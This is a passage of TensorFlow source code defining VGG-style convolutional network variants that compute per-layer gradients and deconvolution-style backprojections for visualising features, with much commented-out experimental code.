#grads_dict['pool3'] = tf.nn.relu(grads_dict['pool3'][0]) + tf.nn.relu(-grads_dict['pool3'][0])
#print(grads_dict['pool1'][0].get_shape())
#raw_input('wait')
## grad for 4
grads_dict['pool4'] = tf.gradients(pool4, pool4, pool4)
grads_dict['pool4'] = tf.nn.relu(grads_dict['pool4'][0]) + tf.nn.relu(-grads_dict['pool4'][0])
grads_dict['pool4'] = tf.gradients(pool4, pool2, grads_dict['pool4'])
grads_dict['pool4'] = tf.nn.relu(grads_dict['pool4'][0]) + tf.nn.relu(-grads_dict['pool4'][0])
grads_dict['pool4'] = tf.gradients(pool2, pool1, grads_dict['pool4'])
grads_dict['pool4'] = tf.nn.relu(grads_dict['pool4'][0]) + tf.nn.relu(-grads_dict['pool4'][0])
grads_dict['pool4'] = tf.gradients(pool1, images, grads_dict['pool4'])
## grad for 5
grads_dict['pool5'] = tf.gradients(pool5, pool5, pool5)
grads_dict['pool5'] = tf.nn.relu(grads_dict['pool5'][0]) + tf.nn.relu(-grads_dict['pool5'][0])
grads_dict['pool5'] = tf.gradients(pool5, pool3, grads_dict['pool5'])
grads_dict['pool5'] = tf.nn.relu(grads_dict['pool5'][0]) + tf.nn.relu(-grads_dict['pool5'][0])
grads_dict['pool5'] = tf.gradients(pool3, pool2, grads_dict['pool5'])
grads_dict['pool5'] = tf.nn.relu(grads_dict['pool5'][0]) + tf.nn.relu(-grads_dict['pool5'][0])
grads_dict['pool5'] = tf.gradients(pool2, pool1, grads_dict['pool5'])
grads_dict['pool5'] = tf.nn.relu(grads_dict['pool5'][0]) + tf.nn.relu(-grads_dict['pool5'][0])
grads_dict['pool5'] = tf.gradients(pool1, images, grads_dict['pool5'])
# same as backprop so maybe tf implements relu backprop using deconv
if DECONV:
grads_dict['pool1_raw'] = tf.gradients(pool1, images, pool1)
grads_dict['pool2_raw'] = tf.gradients(pool2, images, pool2)
grads_dict['pool3_raw'] = tf.gradients(pool3, images, pool3)
grads_dict['pool4_raw'] = tf.gradients(pool4, images, pool4)
grads_dict['pool5_raw'] = tf.gradients(pool5, images, pool5)
# grad for 1
grads_dict['pool1'] = tf.gradients(pool1, images, pool1)
grads_dict['pool1'] = grads_dict['pool1']*(grads_dict['pool1']>0)
# grad for 2
grads_dict['pool2'] = tf.gradients(pool2, pool1, pool2)
grads_dict['pool2'] = grads_dict['pool2']*(grads_dict['pool2']>0)
grads_dict['pool2'] = tf.gradients(pool1, images, grads_dict['pool2'])
grads_dict['pool2'] = grads_dict['pool2']*(grads_dict['pool2']>0)
# grad for 3
grads_dict['pool3'] = tf.gradients(pool3, pool2, pool3)
grads_dict['pool3'] = grads_dict['pool3']*(grads_dict['pool3']>0)
grads_dict['pool3'] = tf.gradients(pool2, pool1, grads_dict['pool3'])
grads_dict['pool3'] = grads_dict['pool3']*(grads_dict['pool3']>0)
grads_dict['pool3'] = tf.gradients(pool1, images, grads_dict['pool3'])
grads_dict['pool3'] = grads_dict['pool3']*(grads_dict['pool3']>0)
# grad for 4
grads_dict['pool4'] = tf.gradients(pool4, pool3, pool4)
grads_dict['pool4'] = grads_dict['pool4']*(grads_dict['pool4']>0)
grads_dict['pool4'] = tf.gradients(pool3, pool2, grads_dict['pool4'])
grads_dict['pool4'] = grads_dict['pool4']*(grads_dict['pool4']>0)
grads_dict['pool4'] = tf.gradients(pool2, pool1, grads_dict['pool4'])
grads_dict['pool4'] = grads_dict['pool4']*(grads_dict['pool4']>0)
grads_dict['pool4'] = tf.gradients(pool1, images, grads_dict['pool4'])
grads_dict['pool4'] = grads_dict['pool4']*(grads_dict['pool4']>0)
# grad for 5
grads_dict['pool5'] = tf.gradients(pool5, pool4, pool5)
grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
grads_dict['pool5'] = tf.gradients(pool4, pool3, grads_dict['pool5'])
grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
grads_dict['pool5'] = tf.gradients(pool3, pool2, grads_dict['pool5'])
grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
grads_dict['pool5'] = tf.gradients(pool2, pool1, grads_dict['pool5'])
grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
grads_dict['pool5'] = tf.gradients(pool1, images, grads_dict['pool5'])
grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
return feat, grads_dict
def model_grad_prev(images, is_training, reuse=False):
""" Gradient of feature map with their respect to the previous feature map
Args:
images: [batch)size, H, W, C]
is_training: True if traning mode (for batchnorm)
"""
if not reuse:
print('inference::input', images.get_shape())
bn = False
grads_dict = {}
argmax = {}
feat = {}
with tf.variable_scope('conv1_1', reuse=reuse) as scope: #1
conv1_1 = tf.layers.conv2d(inputs=images, filters=64, kernel_size=(3,3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv1_1 = tf.contrib.layers.batch_norm(conv1_1, fused=True, decay=0.9, is_training=is_training)
conv1_1 = tf.nn.relu(conv1_1)
if not reuse:
print('conv1_1', conv1_1.get_shape())
with tf.variable_scope('conv1_2', reuse=reuse) as scope: #2
conv1_2 = tf.layers.conv2d(inputs=conv1_1, filters=64, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv1_2 = tf.contrib.layers.batch_norm(conv1_2, fused=True, decay=0.9, is_training=is_training)
conv1_2 = tf.nn.relu(conv1_2)
pool1 = tf.nn.max_pool(conv1_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool1
#pool1,argmax['pool1'] = tf.nn.max_pool_with_argmax(conv1_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool1
if not reuse:
print('pool1', pool1.get_shape())
#feat['pool1'] = pool1
with tf.variable_scope('conv2_1', reuse=reuse) as scope:#3
conv2_1 = tf.layers.conv2d(inputs=pool1, filters=128, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv2_1 = tf.contrib.layers.batch_norm(conv2_1, fused=True, decay=0.9, is_training=is_training)
conv2_1 = tf.nn.relu(conv2_1)
if not reuse:
print('conv2_1', conv2_1.get_shape())
with tf.variable_scope('conv2_2', reuse=reuse) as scope:#4
conv2_2 = tf.layers.conv2d(inputs=conv2_1, filters=128, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv2_2 = tf.contrib.layers.batch_norm(conv2_2, fused=True, decay=0.9, is_training=is_training)
conv2_2 = tf.nn.relu(conv2_2)
pool2 = tf.nn.max_pool(conv2_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool2
#pool2, argmax['pool2'] = tf.nn.max_pool_with_argmax(conv2_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool2
if not reuse:
print('pool2', pool2.get_shape())
with tf.variable_scope('conv3_1', reuse=reuse) as scope:#5
conv3_1 = tf.layers.conv2d(inputs=pool2, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_1 = tf.contrib.layers.batch_norm(conv3_1, fused=True, decay=0.9, is_training=is_training)
conv3_1 = tf.nn.relu(conv3_1)
if not reuse:
print('conv3_1', conv3_1.get_shape())
with tf.variable_scope('conv3_2', reuse=reuse) as scope:#6
conv3_2 = tf.layers.conv2d(inputs=conv3_1, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_2 = tf.contrib.layers.batch_norm(conv3_2, fused=True, decay=0.9, is_training=is_training)
conv3_2 = tf.nn.relu(conv3_2)
if not reuse:
print('conv3_2', conv3_2.get_shape())
with tf.variable_scope('conv3_3', reuse=reuse) as scope:#7
conv3_3 = tf.layers.conv2d(inputs=conv3_2, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_3 = tf.contrib.layers.batch_norm(conv3_3, fused=True, decay=0.9, is_training=is_training)
conv3_3 = tf.nn.relu(conv3_3)
pool3 = tf.nn.max_pool(conv3_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool3
#pool3, argmax['pool3'] = tf.nn.max_pool_with_argmax(conv3_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool3
if not reuse:
print('pool3', pool3.get_shape())
with tf.variable_scope('conv4_1', reuse=reuse) as scope:# 8
conv4_1 = tf.layers.conv2d(inputs=pool3, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_1 = tf.contrib.layers.batch_norm(conv4_1, fused=True, decay=0.9, is_training=is_training)
conv4_1 = tf.nn.relu(conv4_1)
if not reuse:
print('conv4_1', conv4_1.get_shape())
with tf.variable_scope('conv4_2', reuse=reuse) as scope:#9
conv4_2 = tf.layers.conv2d(inputs=conv4_1, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_2 = tf.contrib.layers.batch_norm(conv4_2, fused=True, decay=0.9, is_training=is_training)
conv4_2 = tf.nn.relu(conv4_2)
if not reuse:
print('conv4_2', conv4_2.get_shape())
with tf.variable_scope('conv4_3', reuse=reuse) as scope:#10
conv4_3 = tf.layers.conv2d(inputs=conv4_2, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_3 = tf.contrib.layers.batch_norm(conv4_3, fused=True, decay=0.9, is_training=is_training)
conv4_3 = tf.nn.relu(conv4_3)
pool4 = tf.nn.max_pool(conv4_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool4
#pool4, argmax['pool4'] = tf.nn.max_pool_with_argmax(conv4_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool4
if not reuse:
print('pool4', pool4.get_shape())
with tf.variable_scope('conv5_1', reuse=reuse) as scope:#11
conv5_1 = tf.layers.conv2d(inputs=pool4, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv5_1 = tf.contrib.layers.batch_norm(conv5_1, fused=True, decay=0.9, is_training=is_training)
conv5_1 = tf.nn.relu(conv5_1)
if not reuse:
print('conv5_1', conv5_1.get_shape())
with tf.variable_scope('conv5_2', reuse=reuse) as scope:#12
conv5_2 = tf.layers.conv2d(inputs=conv5_1, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv5_2 = tf.contrib.layers.batch_norm(conv5_2, fused=True, decay=0.9, is_training=is_training)
conv5_2 = tf.nn.relu(conv5_2)
if not reuse:
print('conv5_2', conv5_2.get_shape())
with tf.variable_scope('conv5_3', reuse=reuse) as scope:#13
conv5_3 = tf.layers.conv2d(inputs=conv5_2, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv5_3 = tf.contrib.layers.batch_norm(conv5_3, fused=True, decay=0.9, is_training=is_training)
conv5_3 = tf.nn.relu(conv5_3)
pool5 = tf.nn.max_pool(conv5_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool5
#pool5, argmax['pool5'] = tf.nn.max_pool_with_argmax(conv5_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool5
if not reuse:
print('pool5', pool5.get_shape())
feat['pool1'] = pool1
feat['pool2'] = pool2
feat['pool3'] = pool3
feat['pool4'] = pool4
feat['pool5'] = pool5
grads_dict['conv1_1'] = tf.gradients(conv1_1, images, conv1_1)
grads_dict['conv1_2'] = tf.gradients(conv1_2, conv1_1, conv1_2)
grads_dict['pool1'] = tf.gradients(pool1, conv1_2, pool1)
grads_dict['conv2_1'] = tf.gradients(conv2_1, pool1, conv2_1)
grads_dict['conv2_2'] = tf.gradients(conv2_2, conv2_1, conv2_2)
grads_dict['pool2'] = tf.gradients(pool2, conv2_2, pool2)
grads_dict['conv3_1'] = tf.gradients(conv3_1, pool2, conv3_1)
grads_dict['conv3_2'] = tf.gradients(conv3_2, conv3_1, conv3_2)
grads_dict['conv3_3'] = tf.gradients(conv3_3, conv3_2, conv3_3)
grads_dict['pool3'] = tf.gradients(pool3, conv3_3, pool3)
grads_dict['conv4_1'] = tf.gradients(conv4_1, pool3, conv4_1)
grads_dict['conv4_2'] = tf.gradients(conv4_2, conv4_1, conv4_2)
grads_dict['conv4_3'] = tf.gradients(conv4_3, conv4_2, conv4_3)
grads_dict['pool4'] = tf.gradients(pool4, conv4_3, pool4)
grads_dict['conv5_1'] = tf.gradients(conv5_1, pool4, conv5_1)
grads_dict['conv5_2'] = tf.gradients(conv5_2, conv5_1, conv5_2)
grads_dict['conv5_3'] = tf.gradients(conv5_3, conv5_2, conv5_3)
grads_dict['pool5'] = tf.gradients(pool5, conv5_2, pool5)
return feat, grads_dict
def model_nopool(images, is_training, reuse=False):
""" Network model
Args:
images: Images returned from distorted_inputs() or inputs().
Returns:
Logits.
"""
print('inference::input', images.get_shape())
bn = False
feat, grads_dict = {},{}
with tf.variable_scope('conv1_1', reuse=reuse) as scope: #1
conv1_1 = tf.layers.conv2d(inputs=images, filters=64, kernel_size=(3,3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv1_1 = tf.contrib.layers.batch_norm(conv1_1, fused=True, decay=0.9, is_training=is_training)
conv1_1 = tf.nn.relu(conv1_1)
print('conv1_1', conv1_1.get_shape())
with tf.variable_scope('conv1_2', reuse=reuse) as scope: #2
conv1_2 = tf.layers.conv2d(inputs=conv1_1, filters=64, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv1_2 = tf.contrib.layers.batch_norm(conv1_2, fused=True, decay=0.9, is_training=is_training)
pool1 = tf.nn.relu(conv1_2)
#conv1_2 = tf.nn.relu(conv1_2)
#pool1 = tf.nn.max_pool(conv1_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool1
#feat['pool1'] = pool1
print('pool1', pool1.get_shape())
with tf.variable_scope('conv2_1', reuse=reuse) as scope:#3
conv2_1 = tf.layers.conv2d(inputs=pool1, filters=128, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv2_1 = tf.contrib.layers.batch_norm(conv2_1, fused=True, decay=0.9, is_training=is_training)
conv2_1 = tf.nn.relu(conv2_1)
print('conv2_1', conv2_1.get_shape())
with tf.variable_scope('conv2_2', reuse=reuse) as scope:#4
conv2_2 = tf.layers.conv2d(inputs=conv2_1, filters=128, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv2_2 = tf.contrib.layers.batch_norm(conv2_2, fused=True, decay=0.9, is_training=is_training)
#conv2_2 = tf.nn.relu(conv2_2)
pool2 = tf.nn.relu(conv2_2)
#pool2 = tf.nn.max_pool(conv2_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool2
#feat['pool2'] = pool2
print('pool2', pool2.get_shape())
with tf.variable_scope('conv3_1', reuse=reuse) as scope:#5
conv3_1 = tf.layers.conv2d(inputs=pool2, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_1 = tf.contrib.layers.batch_norm(conv3_1, fused=True, decay=0.9, is_training=is_training)
conv3_1 = tf.nn.relu(conv3_1)
print('conv3_1', conv3_1.get_shape())
with tf.variable_scope('conv3_2', reuse=reuse) as scope:#6
conv3_2 = tf.layers.conv2d(inputs=conv3_1, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_2 = tf.contrib.layers.batch_norm(conv3_2, fused=True, decay=0.9, is_training=is_training)
conv3_2 = tf.nn.relu(conv3_2)
print('conv3_2', conv3_2.get_shape())
with tf.variable_scope('conv3_3', reuse=reuse) as scope:#7
conv3_3 = tf.layers.conv2d(inputs=conv3_2, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_3 = tf.contrib.layers.batch_norm(conv3_3, fused=True, decay=0.9, is_training=is_training)
#conv3_3= tf.nn.relu(conv3_3)
pool3 = tf.nn.relu(conv3_3)
#pool3 = tf.nn.max_pool(conv3_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool3
#pool3 = tf.nn.l2_normalize(pool3, dim=3, epsilon=1e-12)
feat['pool3'] = pool3
print('pool3', pool3.get_shape())
with tf.variable_scope('conv4_1', reuse=reuse) as scope:# 8
conv4_1 = tf.layers.conv2d(inputs=pool3, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_1 = tf.contrib.layers.batch_norm(conv4_1, fused=True, decay=0.9, is_training=is_training)
conv4_1 = tf.nn.relu(conv4_1)
print('conv4_1', conv4_1.get_shape())
with tf.variable_scope('conv4_2', reuse=reuse) as scope:#9
conv4_2 = tf.layers.conv2d(inputs=conv4_1, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_2 = tf.contrib.layers.batch_norm(conv4_2, fused=True, decay=0.9, is_training=is_training)
conv4_2 = tf.nn.relu(conv4_2)
print('conv4_2', conv4_2.get_shape())
with tf.variable_scope('conv4_3', reuse=reuse) as scope:#10
conv4_3 = tf.layers.conv2d(inputs=conv4_2, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_3 = tf.contrib.layers.batch_norm(conv4_3, fused=True, decay=0.9, is_training=is_training)
pool4 = tf.nn.relu(conv4_3)
#conv4_3 = tf.nn.l2_normalize(conv4_3, dim=3, epsilon=1e-12)
#feat['conv4_3'] = conv4_3
#pool4 = tf.nn.max_pool(conv4_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool4
#pool4 = tf.nn.l2_normalize(pool4, dim=3, epsilon=1e-12)
#feat['pool4'] = pool4
print('pool4', pool4.get_shape())
#with tf.variable_scope('conv5_1', reuse=reuse) as scope:#11
# conv5_1 = tf.layers.conv2d(inputs=pool4, filters=512, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv5_1 = tf.contrib.layers.batch_norm(conv5_1, fused=True, decay=0.9, is_training=is_training)
# conv5_1 = tf.nn.relu(conv5_1)
# print('conv5_1', conv5_1.get_shape())
#
#with tf.variable_scope('conv5_2', reuse=reuse) as scope:#12
# conv5_2 = tf.layers.conv2d(inputs=conv5_1, filters=512, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv5_2 = tf.contrib.layers.batch_norm(conv5_2, fused=True, decay=0.9, is_training=is_training)
# conv5_2 = tf.nn.relu(conv5_2)
# print('conv5_2', conv5_2.get_shape())
#with tf.variable_scope('conv5_3', reuse=reuse) as scope:#13
# conv5_3 = tf.layers.conv2d(inputs=conv5_2, filters=512, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv5_3 = tf.contrib.layers.batch_norm(conv5_3, fused=True, decay=0.9, is_training=is_training)
# pool5 = tf.nn.relu(conv5_3)
# #pool5 = tf.nn.max_pool(conv5_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool5
# #pool5 = tf.nn.l2_normalize(pool5, dim=3, epsilon=1e-12)
# print('pool5', pool5.get_shape())
# yayayaya
#feat['pool1'] = tf.gradients(pool1, conv1_2, pool1)
#feat['pool2'] = tf.gradients(pool2, conv2_2, pool2)
#feat['pool3'] = tf.gradients(pool3, conv3_3, pool3)
#feat['pool4'] = tf.gradients(pool4, conv4_3, pool4)
#feat['pool5'] = tf.gradients(pool5, conv5_3, pool5)
# grad prop from 5
#grads_dict['pool5'] = tf.gradients(pool5, conv5_3, pool5)
#grads_dict['pool4'] = tf.gradients(pool4, conv4_3, grads_dict['pool5'])
#grads_dict['pool3'] = tf.gradients(pool3, conv3_3, grads_dict['pool4'])
#grads_dict['pool2'] = tf.gradients(pool2, conv2_2, grads_dict['pool3'])
##grads_dict['pool1'] = tf.gradients(pool1, conv1_2, grads_dict['pool2'])
#grads_dict['pool1'] = tf.gradients(pool1, images, grads_dict['pool2'])
feat['pool1'] = pool1
feat['pool2'] = pool2
feat['pool3'] = pool3
feat['pool4'] = pool4
#feat['pool5'] = pool5
return feat, grads_dict
def model_unpool(images, idx_map, is_training, reuse=False):
""" Network model
Args:
images: [batch)size, H, W, C]
is_training: True if traning mode (for batchnorm)
"""
if not reuse:
print('inference::input', images.get_shape())
bn = True
grads_dict = {}
with tf.variable_scope('conv1_1', reuse=reuse) as scope: #1
conv1_1 = tf.layers.conv2d(inputs=images, filters=64, kernel_size=(3,3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv1_1 = tf.contrib.layers.batch_norm(conv1_1, fused=True, decay=0.9, is_training=is_training)
conv1_1 = tf.nn.relu(conv1_1)
if not reuse:
print('conv1_1', conv1_1.get_shape())
grads_dict['conv1_1'] = tf.gradients(conv1_1, images)
with tf.variable_scope('conv1_2', reuse=reuse) as scope: #2
conv1_2 = tf.layers.conv2d(inputs=conv1_1, filters=64, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv1_2 = tf.contrib.layers.batch_norm(conv1_2, fused=True, decay=0.9, is_training=is_training)
conv1_2 = tf.nn.relu(conv1_2)
pool1 = tf.nn.max_pool(conv1_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool1
if not reuse:
print('pool1', pool1.get_shape())
grads_dict['conv1_2'] = tf.gradients(conv1_2, images)
grads_dict['pool1'] = tf.gradients(pool1, images)
with tf.variable_scope('conv2_1', reuse=reuse) as scope:#3
conv2_1 = tf.layers.conv2d(inputs=pool1, filters=128, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv2_1 = tf.contrib.layers.batch_norm(conv2_1, fused=True, decay=0.9, is_training=is_training)
conv2_1 = tf.nn.relu(conv2_1)
if not reuse:
print('conv2_1', conv2_1.get_shape())
grads_dict['conv2_1'] = tf.gradients(conv2_1, images)
with tf.variable_scope('conv2_2', reuse=reuse) as scope:#4
conv2_2 = tf.layers.conv2d(inputs=conv2_1, filters=128, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv2_2 = tf.contrib.layers.batch_norm(conv2_2, fused=True, decay=0.9, is_training=is_training)
conv2_2 = tf.nn.relu(conv2_2)
pool2 = tf.nn.max_pool(conv2_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool2
if not reuse:
print('pool2', pool2.get_shape())
grads_dict['conv2_2'] = tf.gradients(conv2_2, images)
grads_dict['pool2'] = tf.gradients(pool2, images)
with tf.variable_scope('conv3_1', reuse=reuse) as scope:#5
conv3_1 = tf.layers.conv2d(inputs=pool2, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_1 = tf.contrib.layers.batch_norm(conv3_1, fused=True, decay=0.9, is_training=is_training)
conv3_1 = tf.nn.relu(conv3_1)
if not reuse:
print('conv3_1', conv3_1.get_shape())
grads_dict['conv3_1'] = tf.gradients(conv3_1, images)
with tf.variable_scope('conv3_2', reuse=reuse) as scope:#6
conv3_2 = tf.layers.conv2d(inputs=conv3_1, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_2 = tf.contrib.layers.batch_norm(conv3_2, fused=True, decay=0.9, is_training=is_training)
conv3_2 = tf.nn.relu(conv3_2)
if not reuse:
print('conv3_2', conv3_2.get_shape())
grads_dict['conv3_2'] = tf.gradients(conv3_2, images)
with tf.variable_scope('conv3_3', reuse=reuse) as scope:#7
conv3_3 = tf.layers.conv2d(inputs=conv3_2, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_3 = tf.contrib.layers.batch_norm(conv3_3, fused=True, decay=0.9, is_training=is_training)
conv3_3 = tf.nn.relu(conv3_3)
pool3 = tf.nn.max_pool(conv3_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool3
if not reuse:
print('pool3', pool3.get_shape())
grads_dict['conv3_3'] = tf.gradients(conv3_3, images)
grads_dict['pool3'] = tf.gradients(pool3, images)
with tf.variable_scope('conv4_1', reuse=reuse) as scope:# 8
conv4_1 = tf.layers.conv2d(inputs=pool3, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_1 = tf.contrib.layers.batch_norm(conv4_1, fused=True, decay=0.9, is_training=is_training)
conv4_1 = tf.nn.relu(conv4_1)
if not reuse:
print('conv4_1', conv4_1.get_shape())
grads_dict['conv4_1'] = tf.gradients(conv4_1, images)
with tf.variable_scope('conv4_2', reuse=reuse) as scope:#9
conv4_2 = tf.layers.conv2d(inputs=conv4_1, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_2 = tf.contrib.layers.batch_norm(conv4_2, fused=True, decay=0.9, is_training=is_training)
conv4_2 = tf.nn.relu(conv4_2)
if not reuse:
print('conv4_2', conv4_2.get_shape())
grads_dict['conv4_2'] = tf.gradients(conv4_2, images)
with tf.variable_scope('conv4_3', reuse=reuse) as scope:#10
conv4_3 = tf.layers.conv2d(inputs=conv4_2, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_3 = tf.contrib.layers.batch_norm(conv4_3, fused=True, decay=0.9, is_training=is_training)
conv4_3 = tf.nn.relu(conv4_3)
pool4 = tf.nn.max_pool(conv4_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool4
if not reuse:
print('pool4', pool4.get_shape())
grads_dict['conv4_3'] = tf.gradients(conv4_3, images)
grads_dict['pool4'] = tf.gradients(pool4, images)
with tf.variable_scope('conv5_1', reuse=reuse) as scope:#11
conv5_1 = tf.layers.conv2d(inputs=pool4, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv5_1 = tf.contrib.layers.batch_norm(conv5_1, fused=True, decay=0.9, is_training=is_training)
conv5_1 = tf.nn.relu(conv5_1)
if not reuse:
print('conv5_1', conv5_1.get_shape())
grads_dict['conv5_1'] = tf.gradients(conv5_1, images)
with tf.variable_scope('conv5_2', reuse=reuse) as scope:#12
conv5_2 = tf.layers.conv2d(inputs=conv5_1, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv5_2 = tf.contrib.layers.batch_norm(conv5_2, fused=True, decay=0.9, is_training=is_training)
conv5_2 = tf.nn.relu(conv5_2)
if not reuse:
print('conv5_2', conv5_2.get_shape())
grads_dict['conv5_2'] = tf.gradients(conv5_2, images)
with tf.variable_scope('conv5_3', reuse=reuse) as scope:#13
conv5_3 = tf.layers.conv2d(inputs=conv5_2, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv5_3 = tf.contrib.layers.batch_norm(conv5_3, fused=True, decay=0.9, is_training=is_training)
conv5_3 = tf.nn.relu(conv5_3)
pool5 = tf.nn.max_pool(conv5_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool5
if not reuse:
print('pool5', pool5.get_shape())
grads_dict['conv5_3'] = tf.gradients(conv5_3, images)
grads_dict['pool5'] = tf.gradients(pool5, images)
########################################################################################
#with tf.variable_scope('unpool5', reuse=reuse) as scope:#14
# #unpool5 = gen_nn_ops._max_pool_grad(idx_map, pool5, pool5, [1,3,3,1], [1,2,2,1],'VALID')
# unpool5 = gen_nn_ops._max_pool_grad(conv5_3, pool5, pool5, [1,2,2,1], [1,2,2,1],'VALID')
# print('unpool5', unpool5.get_shape())
# #tf.summary.image('unpool5', unpool5)
#
#with tf.variable_scope('unpool4', reuse=reuse) as scope:#17
# unpool4 = gen_nn_ops._max_pool_grad(conv4_3, pool4, unpool5, [1,2,2,1], [1,2,2,1],'VALID')
# conv4_1D = tf.layers.conv2d(unpool4, filters=256, kernel_size=(1,1),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# print('unpool4', unpool4.get_shape())
# print('conv4_1D', conv4_1D.get_shape())
# #tf.summary.image('unpool4', unpool4)
#with tf.variable_scope('unpool3', reuse=reuse) as scope:#20
# #unpool3 = gen_nn_ops._max_pool_grad(conv3_3, pool3, unpool4, [1,2,2,1], [1,2,2,1],'VALID')
# unpool3 = gen_nn_ops._max_pool_grad(conv3_3, pool3, conv4_1D, [1,2,2,1], [1,2,2,1],'VALID')
# conv3_1D = tf.layers.conv2d(unpool3, filters=128, kernel_size=(1,1),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# print('unpool3', unpool3.get_shape())
# print('conv3_1D', conv3_1D.get_shape())
# #tf.summary.image('unpool3', unpool3)
#with tf.variable_scope('unpool2', reuse=reuse) as scope:#23
